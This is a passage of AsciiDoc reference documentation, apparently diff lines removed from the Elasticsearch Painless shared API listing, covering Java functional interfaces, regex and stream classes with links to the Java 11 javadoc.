{java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* IntPredicate {java11-javadoc}/java.base/java/util/function/IntPredicate.html#negate()[negate]() -* IntPredicate {java11-javadoc}/java.base/java/util/function/IntPredicate.html#or(java.util.function.IntPredicate)[or](IntPredicate) -* boolean {java11-javadoc}/java.base/java/util/function/IntPredicate.html#test(int)[test](int) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IntSupplier]] -==== IntSupplier -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/util/function/IntSupplier.html#getAsInt()[getAsInt]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IntToDoubleFunction]] -==== IntToDoubleFunction -* double {java11-javadoc}/java.base/java/util/function/IntToDoubleFunction.html#applyAsDouble(int)[applyAsDouble](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IntToLongFunction]] -==== IntToLongFunction -* long {java11-javadoc}/java.base/java/util/function/IntToLongFunction.html#applyAsLong(int)[applyAsLong](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IntUnaryOperator]] -==== IntUnaryOperator -* static IntUnaryOperator {java11-javadoc}/java.base/java/util/function/IntUnaryOperator.html#identity()[identity]() -* IntUnaryOperator {java11-javadoc}/java.base/java/util/function/IntUnaryOperator.html#andThen(java.util.function.IntUnaryOperator)[andThen](IntUnaryOperator) -* int {java11-javadoc}/java.base/java/util/function/IntUnaryOperator.html#applyAsInt(int)[applyAsInt](int) -* IntUnaryOperator {java11-javadoc}/java.base/java/util/function/IntUnaryOperator.html#compose(java.util.function.IntUnaryOperator)[compose](IntUnaryOperator) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongBinaryOperator]] -==== LongBinaryOperator -* long {java11-javadoc}/java.base/java/util/function/LongBinaryOperator.html#applyAsLong(long,long)[applyAsLong](long, long) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongConsumer]] -==== LongConsumer -* void {java11-javadoc}/java.base/java/util/function/LongConsumer.html#accept(long)[accept](long) -* LongConsumer {java11-javadoc}/java.base/java/util/function/LongConsumer.html#andThen(java.util.function.LongConsumer)[andThen](LongConsumer) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongFunction]] -==== LongFunction -* def {java11-javadoc}/java.base/java/util/function/LongFunction.html#apply(long)[apply](long) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongPredicate]] -==== LongPredicate -* LongPredicate {java11-javadoc}/java.base/java/util/function/LongPredicate.html#and(java.util.function.LongPredicate)[and](LongPredicate) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* LongPredicate {java11-javadoc}/java.base/java/util/function/LongPredicate.html#negate()[negate]() -* LongPredicate {java11-javadoc}/java.base/java/util/function/LongPredicate.html#or(java.util.function.LongPredicate)[or](LongPredicate) -* boolean {java11-javadoc}/java.base/java/util/function/LongPredicate.html#test(long)[test](long) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongSupplier]] -==== LongSupplier -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/util/function/LongSupplier.html#getAsLong()[getAsLong]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongToDoubleFunction]] -==== LongToDoubleFunction -* double {java11-javadoc}/java.base/java/util/function/LongToDoubleFunction.html#applyAsDouble(long)[applyAsDouble](long) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongToIntFunction]] -==== LongToIntFunction -* int {java11-javadoc}/java.base/java/util/function/LongToIntFunction.html#applyAsInt(long)[applyAsInt](long) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongUnaryOperator]] -==== LongUnaryOperator -* static LongUnaryOperator {java11-javadoc}/java.base/java/util/function/LongUnaryOperator.html#identity()[identity]() -* LongUnaryOperator {java11-javadoc}/java.base/java/util/function/LongUnaryOperator.html#andThen(java.util.function.LongUnaryOperator)[andThen](LongUnaryOperator) -* long {java11-javadoc}/java.base/java/util/function/LongUnaryOperator.html#applyAsLong(long)[applyAsLong](long) -* LongUnaryOperator {java11-javadoc}/java.base/java/util/function/LongUnaryOperator.html#compose(java.util.function.LongUnaryOperator)[compose](LongUnaryOperator) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ObjDoubleConsumer]] -==== ObjDoubleConsumer -* void {java11-javadoc}/java.base/java/util/function/ObjDoubleConsumer.html#accept(java.lang.Object,double)[accept](def, double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ObjIntConsumer]] -==== ObjIntConsumer -* void {java11-javadoc}/java.base/java/util/function/ObjIntConsumer.html#accept(java.lang.Object,int)[accept](def, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ObjLongConsumer]] -==== ObjLongConsumer -* void {java11-javadoc}/java.base/java/util/function/ObjLongConsumer.html#accept(java.lang.Object,long)[accept](def, long) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Predicate]] -==== Predicate -* static Predicate {java11-javadoc}/java.base/java/util/function/Predicate.html#isEqual(java.lang.Object)[isEqual](def) -* Predicate {java11-javadoc}/java.base/java/util/function/Predicate.html#and(java.util.function.Predicate)[and](Predicate) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Predicate {java11-javadoc}/java.base/java/util/function/Predicate.html#negate()[negate]() -* Predicate {java11-javadoc}/java.base/java/util/function/Predicate.html#or(java.util.function.Predicate)[or](Predicate) -* boolean {java11-javadoc}/java.base/java/util/function/Predicate.html#test(java.lang.Object)[test](def) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Supplier]] -==== Supplier -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* def {java11-javadoc}/java.base/java/util/function/Supplier.html#get()[get]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ToDoubleBiFunction]] -==== ToDoubleBiFunction -* double {java11-javadoc}/java.base/java/util/function/ToDoubleBiFunction.html#applyAsDouble(java.lang.Object,java.lang.Object)[applyAsDouble](def, def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ToDoubleFunction]] -==== ToDoubleFunction -* double {java11-javadoc}/java.base/java/util/function/ToDoubleFunction.html#applyAsDouble(java.lang.Object)[applyAsDouble](def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ToIntBiFunction]] -==== ToIntBiFunction -* int {java11-javadoc}/java.base/java/util/function/ToIntBiFunction.html#applyAsInt(java.lang.Object,java.lang.Object)[applyAsInt](def, def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ToIntFunction]] -==== ToIntFunction -* int {java11-javadoc}/java.base/java/util/function/ToIntFunction.html#applyAsInt(java.lang.Object)[applyAsInt](def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ToLongBiFunction]] -==== ToLongBiFunction -* long {java11-javadoc}/java.base/java/util/function/ToLongBiFunction.html#applyAsLong(java.lang.Object,java.lang.Object)[applyAsLong](def, def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ToLongFunction]] -==== ToLongFunction -* long {java11-javadoc}/java.base/java/util/function/ToLongFunction.html#applyAsLong(java.lang.Object)[applyAsLong](def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-UnaryOperator]] -==== UnaryOperator -* static UnaryOperator {java11-javadoc}/java.base/java/util/function/UnaryOperator.html#identity()[identity]() -* Function {java11-javadoc}/java.base/java/util/function/Function.html#andThen(java.util.function.Function)[andThen](Function) -* def {java11-javadoc}/java.base/java/util/function/Function.html#apply(java.lang.Object)[apply](def) -* Function {java11-javadoc}/java.base/java/util/function/Function.html#compose(java.util.function.Function)[compose](Function) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-java-util-regex"] -=== Shared API for package java.util.regex -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-Matcher]] -==== Matcher -* static null {java11-javadoc}/java.base/java/util/regex/Matcher.html#quoteReplacement(java.lang.String)[quoteReplacement](null) -* int {java11-javadoc}/java.base/java/util/regex/Matcher.html#end()[end]() -* int {java11-javadoc}/java.base/java/util/regex/Matcher.html#end(int)[end](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/util/regex/Matcher.html#find()[find]() -* boolean {java11-javadoc}/java.base/java/util/regex/Matcher.html#find(int)[find](int) -* null {java11-javadoc}/java.base/java/util/regex/Matcher.html#group()[group]() -* null {java11-javadoc}/java.base/java/util/regex/Matcher.html#group(int)[group](int) -* int {java11-javadoc}/java.base/java/util/regex/Matcher.html#groupCount()[groupCount]() -* boolean {java11-javadoc}/java.base/java/util/regex/Matcher.html#hasAnchoringBounds()[hasAnchoringBounds]() -* boolean {java11-javadoc}/java.base/java/util/regex/Matcher.html#hasTransparentBounds()[hasTransparentBounds]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/regex/Matcher.html#hitEnd()[hitEnd]() -* boolean {java11-javadoc}/java.base/java/util/regex/Matcher.html#lookingAt()[lookingAt]() -* boolean {java11-javadoc}/java.base/java/util/regex/Matcher.html#matches()[matches]() -* null namedGroup(null) -* Pattern {java11-javadoc}/java.base/java/util/regex/Matcher.html#pattern()[pattern]() -* Matcher {java11-javadoc}/java.base/java/util/regex/Matcher.html#region(int,int)[region](int, int) -* int {java11-javadoc}/java.base/java/util/regex/Matcher.html#regionEnd()[regionEnd]() -* int {java11-javadoc}/java.base/java/util/regex/Matcher.html#regionStart()[regionStart]() -* null {java11-javadoc}/java.base/java/util/regex/Matcher.html#replaceAll(java.lang.String)[replaceAll](null) -* null {java11-javadoc}/java.base/java/util/regex/Matcher.html#replaceFirst(java.lang.String)[replaceFirst](null) -* boolean {java11-javadoc}/java.base/java/util/regex/Matcher.html#requireEnd()[requireEnd]() -* Matcher {java11-javadoc}/java.base/java/util/regex/Matcher.html#reset()[reset]() -* int {java11-javadoc}/java.base/java/util/regex/Matcher.html#start()[start]() -* int {java11-javadoc}/java.base/java/util/regex/Matcher.html#start(int)[start](int) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Matcher {java11-javadoc}/java.base/java/util/regex/Matcher.html#useAnchoringBounds(boolean)[useAnchoringBounds](boolean) -* Matcher {java11-javadoc}/java.base/java/util/regex/Matcher.html#usePattern(java.util.regex.Pattern)[usePattern](Pattern) -* Matcher {java11-javadoc}/java.base/java/util/regex/Matcher.html#useTransparentBounds(boolean)[useTransparentBounds](boolean) - - -[[painless-api-reference-shared-Pattern]] -==== Pattern -* static null {java11-javadoc}/java.base/java/util/regex/Pattern.html#quote(java.lang.String)[quote](null) -* Predicate {java11-javadoc}/java.base/java/util/regex/Pattern.html#asPredicate()[asPredicate]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/util/regex/Pattern.html#flags()[flags]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Matcher {java11-javadoc}/java.base/java/util/regex/Pattern.html#matcher(java.lang.CharSequence)[matcher](CharSequence) -* null {java11-javadoc}/java.base/java/util/regex/Pattern.html#pattern()[pattern]() -* null[] {java11-javadoc}/java.base/java/util/regex/Pattern.html#split(java.lang.CharSequence)[split](CharSequence) -* null[] {java11-javadoc}/java.base/java/util/regex/Pattern.html#split(java.lang.CharSequence,int)[split](CharSequence, int) -* Stream {java11-javadoc}/java.base/java/util/regex/Pattern.html#splitAsStream(java.lang.CharSequence)[splitAsStream](CharSequence) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-java-util-stream"] -=== Shared API for package java.util.stream -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-BaseStream]] -==== BaseStream -* void {java11-javadoc}/java.base/java/util/stream/BaseStream.html#close()[close]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/stream/BaseStream.html#isParallel()[isParallel]() -* Iterator {java11-javadoc}/java.base/java/util/stream/BaseStream.html#iterator()[iterator]() -* BaseStream {java11-javadoc}/java.base/java/util/stream/BaseStream.html#sequential()[sequential]() -* Spliterator {java11-javadoc}/java.base/java/util/stream/BaseStream.html#spliterator()[spliterator]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* BaseStream {java11-javadoc}/java.base/java/util/stream/BaseStream.html#unordered()[unordered]() - - -[[painless-api-reference-shared-Collector]] -==== Collector -* static Collector {java11-javadoc}/java.base/java/util/stream/Collector.html#of(java.util.function.Supplier,java.util.function.BiConsumer,java.util.function.BinaryOperator,java.util.stream.Collector$Characteristics%5B%5D)[of](Supplier, BiConsumer, BinaryOperator, Collector.Characteristics[]) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collector.html#of(java.util.function.Supplier,java.util.function.BiConsumer,java.util.function.BinaryOperator,java.util.function.Function,java.util.stream.Collector$Characteristics%5B%5D)[of](Supplier, BiConsumer, BinaryOperator, Function, Collector.Characteristics[]) -* BiConsumer {java11-javadoc}/java.base/java/util/stream/Collector.html#accumulator()[accumulator]() -* Set {java11-javadoc}/java.base/java/util/stream/Collector.html#characteristics()[characteristics]() -* BinaryOperator {java11-javadoc}/java.base/java/util/stream/Collector.html#combiner()[combiner]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* Function {java11-javadoc}/java.base/java/util/stream/Collector.html#finisher()[finisher]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Supplier {java11-javadoc}/java.base/java/util/stream/Collector.html#supplier()[supplier]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Collector-Characteristics]] -==== Collector.Characteristics -* static Collector.Characteristics {java11-javadoc}/java.base/java/util/stream/Collector$Characteristics.html#CONCURRENT[CONCURRENT] -* static Collector.Characteristics {java11-javadoc}/java.base/java/util/stream/Collector$Characteristics.html#IDENTITY_FINISH[IDENTITY_FINISH] -* static Collector.Characteristics {java11-javadoc}/java.base/java/util/stream/Collector$Characteristics.html#UNORDERED[UNORDERED] -* static Collector.Characteristics {java11-javadoc}/java.base/java/util/stream/Collector$Characteristics.html#valueOf(java.lang.String)[valueOf](null) -* static Collector.Characteristics[] {java11-javadoc}/java.base/java/util/stream/Collector$Characteristics.html#values()[values]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Collectors]] -==== Collectors -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#averagingDouble(java.util.function.ToDoubleFunction)[averagingDouble](ToDoubleFunction) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#averagingInt(java.util.function.ToIntFunction)[averagingInt](ToIntFunction) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#averagingLong(java.util.function.ToLongFunction)[averagingLong](ToLongFunction) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#collectingAndThen(java.util.stream.Collector,java.util.function.Function)[collectingAndThen](Collector, Function) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#counting()[counting]() -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#groupingBy(java.util.function.Function)[groupingBy](Function) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#groupingBy(java.util.function.Function,java.util.stream.Collector)[groupingBy](Function, Collector) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#groupingBy(java.util.function.Function,java.util.function.Supplier,java.util.stream.Collector)[groupingBy](Function, Supplier, Collector) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#joining()[joining]() -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#joining(java.lang.CharSequence)[joining](CharSequence) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#joining(java.lang.CharSequence,java.lang.CharSequence,java.lang.CharSequence)[joining](CharSequence, CharSequence, CharSequence) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#mapping(java.util.function.Function,java.util.stream.Collector)[mapping](Function, Collector) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#maxBy(java.util.Comparator)[maxBy](Comparator) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#minBy(java.util.Comparator)[minBy](Comparator) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#partitioningBy(java.util.function.Predicate)[partitioningBy](Predicate) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#partitioningBy(java.util.function.Predicate,java.util.stream.Collector)[partitioningBy](Predicate, Collector) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#reducing(java.util.function.BinaryOperator)[reducing](BinaryOperator) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#reducing(java.lang.Object,java.util.function.BinaryOperator)[reducing](def, BinaryOperator) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#reducing(java.lang.Object,java.util.function.Function,java.util.function.BinaryOperator)[reducing](def, Function, BinaryOperator) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#summarizingDouble(java.util.function.ToDoubleFunction)[summarizingDouble](ToDoubleFunction) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#summarizingInt(java.util.function.ToIntFunction)[summarizingInt](ToIntFunction) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#summarizingLong(java.util.function.ToLongFunction)[summarizingLong](ToLongFunction) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#summingDouble(java.util.function.ToDoubleFunction)[summingDouble](ToDoubleFunction) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#summingInt(java.util.function.ToIntFunction)[summingInt](ToIntFunction) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#summingLong(java.util.function.ToLongFunction)[summingLong](ToLongFunction) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#toCollection(java.util.function.Supplier)[toCollection](Supplier) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#toList()[toList]() -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#toMap(java.util.function.Function,java.util.function.Function)[toMap](Function, Function) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#toMap(java.util.function.Function,java.util.function.Function,java.util.function.BinaryOperator)[toMap](Function, Function, BinaryOperator) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#toMap(java.util.function.Function,java.util.function.Function,java.util.function.BinaryOperator,java.util.function.Supplier)[toMap](Function, Function, BinaryOperator, Supplier) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#toSet()[toSet]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoubleStream]] -==== DoubleStream -* static DoubleStream.Builder {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#builder()[builder]() -* static DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#concat(java.util.stream.DoubleStream,java.util.stream.DoubleStream)[concat](DoubleStream, DoubleStream) -* static DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#empty()[empty]() -* static DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#of(double%5B%5D)[of](double[]) -* boolean {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#allMatch(java.util.function.DoublePredicate)[allMatch](DoublePredicate) -* boolean {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#anyMatch(java.util.function.DoublePredicate)[anyMatch](DoublePredicate) -* OptionalDouble {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#average()[average]() -* Stream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#boxed()[boxed]() -* void {java11-javadoc}/java.base/java/util/stream/BaseStream.html#close()[close]() -* def {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#collect(java.util.function.Supplier,java.util.function.ObjDoubleConsumer,java.util.function.BiConsumer)[collect](Supplier, ObjDoubleConsumer, BiConsumer) -* long {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#count()[count]() -* DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#distinct()[distinct]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#filter(java.util.function.DoublePredicate)[filter](DoublePredicate) -* OptionalDouble {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#findAny()[findAny]() -* OptionalDouble {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#findFirst()[findFirst]() -* DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#flatMap(java.util.function.DoubleFunction)[flatMap](DoubleFunction) -* void {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#forEach(java.util.function.DoubleConsumer)[forEach](DoubleConsumer) -* void {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#forEachOrdered(java.util.function.DoubleConsumer)[forEachOrdered](DoubleConsumer) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/stream/BaseStream.html#isParallel()[isParallel]() -* PrimitiveIterator.OfDouble {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#iterator()[iterator]() -* DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#limit(long)[limit](long) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#map(java.util.function.DoubleUnaryOperator)[map](DoubleUnaryOperator) -* IntStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#mapToInt(java.util.function.DoubleToIntFunction)[mapToInt](DoubleToIntFunction) -* LongStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#mapToLong(java.util.function.DoubleToLongFunction)[mapToLong](DoubleToLongFunction) -* Stream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#mapToObj(java.util.function.DoubleFunction)[mapToObj](DoubleFunction) -* OptionalDouble {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#max()[max]() -* OptionalDouble {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#min()[min]() -* boolean {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#noneMatch(java.util.function.DoublePredicate)[noneMatch](DoublePredicate) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#peek(java.util.function.DoubleConsumer)[peek](DoubleConsumer) -* OptionalDouble {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#reduce(java.util.function.DoubleBinaryOperator)[reduce](DoubleBinaryOperator) -* double {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#reduce(double,java.util.function.DoubleBinaryOperator)[reduce](double, DoubleBinaryOperator) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#sequential()[sequential]() -* DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#skip(long)[skip](long) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#sorted()[sorted]() -* Spliterator.OfDouble {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#spliterator()[spliterator]() -* double {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#sum()[sum]() -* DoubleSummaryStatistics {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#summaryStatistics()[summaryStatistics]() -* double[] {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#toArray()[toArray]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* BaseStream {java11-javadoc}/java.base/java/util/stream/BaseStream.html#unordered()[unordered]() - - -[[painless-api-reference-shared-DoubleStream-Builder]] -==== DoubleStream.Builder -* void {java11-javadoc}/java.base/java/util/function/DoubleConsumer.html#accept(double)[accept](double) -* DoubleStream.Builder {java11-javadoc}/java.base/java/util/stream/DoubleStream$Builder.html#add(double)[add](double) -* DoubleConsumer {java11-javadoc}/java.base/java/util/function/DoubleConsumer.html#andThen(java.util.function.DoubleConsumer)[andThen](DoubleConsumer) -* 